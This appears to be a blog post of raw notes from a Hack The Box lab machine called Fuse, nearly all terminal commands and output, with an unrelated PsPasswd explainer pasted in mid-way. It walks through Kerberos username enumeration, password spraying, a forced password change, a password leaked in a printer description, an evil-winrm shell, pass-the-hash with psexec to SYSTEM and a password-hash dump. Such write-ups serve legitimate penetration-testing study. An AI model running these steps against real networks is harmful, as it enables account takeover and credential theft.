/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 06/17/20 - Ronnie Flathers @ropnop

2020/06/17 12:06:02 > Using KDC(s):
2020/06/17 12:06:02 > fabricorp.local:88
2020/06/17 12:06:21 > [+] VALID USERNAME: administrator@fabricorp
2020/06/17 12:08:31 > [+] VALID USERNAME: Administrator@fabricorp
2020/06/17 12:16:07 > [+] VALID USERNAME: sthompson@fabricorp
2020/06/17 12:22:27 > [+] VALID USERNAME: fuse@fabricorp
2020/06/17 12:22:27 > [+] VALID USERNAME: bhult@fabricorp
2020/06/17 12:22:43 > Done! Tested 100000 usernames (5 valid) in 1001.177 seconds

combined

E:\PENTEST>kerbrute_windows_amd64.exe userenum --dc fabricorp.local -d fabricorp userlistsmall.txt

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 06/17/20 - Ronnie Flathers @ropnop

2020/06/17 12:27:46 > Using KDC(s):
2020/06/17 12:27:46 > fabricorp.local:88
2020/06/17 12:27:46 > [+] VALID USERNAME: fuse@fabricorp
2020/06/17 12:27:46 > [+] VALID USERNAME: Administrator@fabricorp
2020/06/17 12:27:46 > [+] VALID USERNAME: tlavel@fabricorp
2020/06/17 12:27:46 > [+] VALID USERNAME: sthompson@fabricorp
2020/06/17 12:27:46 > [+] VALID USERNAME: pmerton@fabricorp
2020/06/17 12:27:46 > [+] VALID USERNAME: bnielson@fabricorp
2020/06/17 12:27:46 > [+] VALID USERNAME: bhult@fabricorp
2020/06/17 12:27:46 > Done! Tested 9 usernames (7 valid) in 0.153 seconds

.

check if any of these 7 have UF_DONT_REQUIRE_PREAUTH set

root@kali:~/htb/fuse# GetNPUsers.py -dc-ip 10.10.10.193 -no-pass FABRICORP.LOCAL/bnielson
Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for bnielson
[-] User bnielson doesn't have UF_DONT_REQUIRE_PREAUTH set

.

E:\PENTEST>crackmapexec.exe 10.10.10.193 -u usernames.txt -p Fabricorp01
06-17-2020 14:20:32 [*] 10.10.10.193:445 is running Windows 10.0 Build 14393 (name:FUSE) (domain:FABRICORP)
06-17-2020 14:20:34 [-] 10.10.10.193:445 FABRICORP\fuse:Fabricorp01 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
06-17-2020 14:20:34 [-] 10.10.10.193:445 FABRICORP\Administrator:Fabricorp01 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\tlavel:Fabricorp01 SMB SessionError: STATUS_PASSWORD_MUST_CHANGE(The user password must be changed before logging on the first time.)
06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\sthompson:Fabricorp01 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\pmerton:Fabricorp01 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\bnielson:Fabricorp01 SMB SessionError: STATUS_PASSWORD_MUST_CHANGE(The user password must be changed before logging on the first time.)
06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\bhult:Fabricorp01 SMB SessionError: STATUS_PASSWORD_MUST_CHANGE(The user password must be changed before logging on the first time.)

.

tried but failed

Remote Windows Systems Using SyInternals PsPasswd

We all know that a good Administrator will find a way to automate or make boring tasks easy. Changing passwords on Windows systems, usually Administrator accounts, is one of those we least like to do but have to for audit purposes and also when other administrators leave.

Well, here is another tool that can help with changing passwords. The free utility PsPasswd is part of Microsoft’s SysInternal’s PsTools that lets you change an account password on the local or remote systems, to enable admin’s to create batch files that run PsPasswd against the computers they manage to perform a mass change of the administrator password.

And for security, PsPasswd does not send passwords over the network in the clear. You can use PsPasswd to change the password of a local or domain account on the local or a remote computer.

So how does it work?

usage: pspasswd [[\\computer[,computer[,..] | @file [-u user [-p psswd]]] Username [NewPassword]

computer – Perform the command on the remote computer or computers specified. If you omit the computer name the command runs on the local system, and if you specify a wildcard (\\*), the command runs on all computers in the current domain.
@file – Run the command on each computer listed in the text file specified.
-u – Specifies optional user name for login to remote computer.
-p – Specifies optional password for user name. If you omit this you will be prompted to enter a hidden password.
Username – Specifies name of account for password change.
NewPassword – New password. If ommitted a NULL password is applied.

So say we wanted to change the password on a server.

That’s all. Now say we don’t want to pass the password on the command line, then omit the -p and a popup will prompt you for the password.

E:\PENTEST>pspasswd \\10.10.10.193 -u tlavel -p Fabricorp01 tlavel F!bricorp02!

PsPasswd v1.24 - Local and remote password changer
Copyright (C) 2003-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

Error changing password:
Access is denied.

E:\PENTEST>

.

tried

root@kali:~/htb# smbpasswd -r 10.10.10.193 -U bnielson
Old SMB password:Fabricorp01
New SMB password:1234567
Retype new SMB password:
machine 10.10.10.193 rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria..
root@kali:~/htb# smbpasswd -r 10.10.10.193 -U bnielson
Old SMB password:Fabricorp01
New SMB password:Fabricorp02
Retype new SMB password: Fabricorp01
Password changed for user bnielson on 10.10.10.193.

.

root@kali:~/htb# smbpasswd -r 10.10.10.193 -U bnielson
Old SMB password:Fabricorp01
New SMB password:Fabricorp02
Retype new SMB password:Fabricorp02
Password changed for user bnielson on 10.10.10.193.
root@kali:~/htb# smbclient //10.10.10.193/print$ -U bnielson
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\bnielson's password: Fabricorp02
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri May 29 20:12:41 2020
.. D 0 Fri May 29 20:12:41 2020
color D 0 Sat Jul 16 09:18:08 2016
IA64 D 0 Fri May 29 20:12:41 2020
W32X86 D 0 Mon Jun 1 05:03:44 2020
x64 D 0 Mon Jun 1 05:03:46 2020

10340607 blocks of size 4096. 7554925 blocks available
smb: \>

.

rpcclient -U “bnielson” 10.10.10.193

root@kali:~/htb# rpcclient -U "bnielson" 10.10.10.193
Enter WORKGROUP\bnielson's password:Fabricorp02 
rpcclient $> ls
command not found: ls
rpcclient $> help
--------------- ----------------------
CLUSAPI 
clusapi_open_cluster bla
clusapi_get_cluster_name bla
-snip-

rpcclient $>


rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]

rpcclient $>

.

rpcclient $> enumprinters
flags:[0x800000]
name:[\\10.10.10.193\HP-MFT01]
description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
comment:[]

.

root@kali:/opt/evil-winrm# ruby evil-winrm.rb -i 10.10.10.193 -u svc-print
Enter Password: $fab@s3Rv1ce$1

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-print> cd desktop
*Evil-WinRM* PS C:\Users\svc-print\desktop> dir


Directory: C:\Users\svc-print\desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/17/2020 11:49 PM 34 user.txt


*Evil-WinRM* PS C:\Users\svc-print\desktop> type user.txt
867719f8b9ef372cd05d1e30997c7d28
*Evil-WinRM* PS C:\Users\svc-print\desktop>

.

root@kali:~/htb/fuse# psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:370ddcf45959b2293427baa70376e14e Administrator@10.10.10.193
Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.193.....
[*] Found writable share ADMIN$
[*] Uploading file VwvVtgEd.exe
[*] Opening SVCManager on 10.10.10.193.....
[*] Creating service fhoH on 10.10.10.193.....
[*] Starting service fhoH.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>cd c:\users\desktop
The system cannot find the path specified.

C:\Windows\system32>cd c:\users

c:\Users>cd Administrator

c:\Users\Administrator>cd desktop

c:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is E6C8-44FE

Directory of c:\Users\Administrator\Desktop

06/01/2020 02:03 AM <DIR> .
06/01/2020 02:03 AM <DIR> ..
06/17/2020 11:49 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 30,865,776,640 bytes free

c:\Users\Administrator\Desktop>type root.txt
2b81c0276298df3453ae7da86e9babf4

c:\Users\Administrator\Desktop>


.

.

c:\tja>pwdump8

PwDump v8.2 - dumps windows password hashes - by Fulvio Zanetti & Andrea Petralia @ http://www.blackMath.it

Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:521A94AF0CFA785A1EEC638D803E482C
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
DefaultAccount:503:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0

.

 

 

 

 

 

Author Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *